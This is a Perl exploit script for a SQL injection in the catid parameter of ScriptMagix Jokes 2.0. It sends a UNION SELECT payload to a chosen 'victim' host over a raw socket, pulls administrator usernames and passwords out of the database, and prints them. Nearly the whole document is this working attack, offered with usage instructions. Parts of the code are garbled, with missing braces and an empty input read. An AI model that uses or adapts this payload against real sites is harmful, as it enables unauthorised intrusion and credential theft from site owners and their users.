#[Script Name: ScriptMagix Jokes <= 2.0 (index.php catid) Remote Blind SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.scriptmagix.com
#[$$ : 35$
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV < 1){
print "
[// ScriptMagix Jokes <= 2.0 (index.php catid) Remote Blind SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?catid=";
print "Script
: ";
$dir = ;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
$target = "-1%20union%20select%200,1,2,0,0,0,0,7,6,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),4,3%20from%20admin/*";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
if ($answer =~ /password:(.*?)<\/a>/){
print "+ Password: $1\n";
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";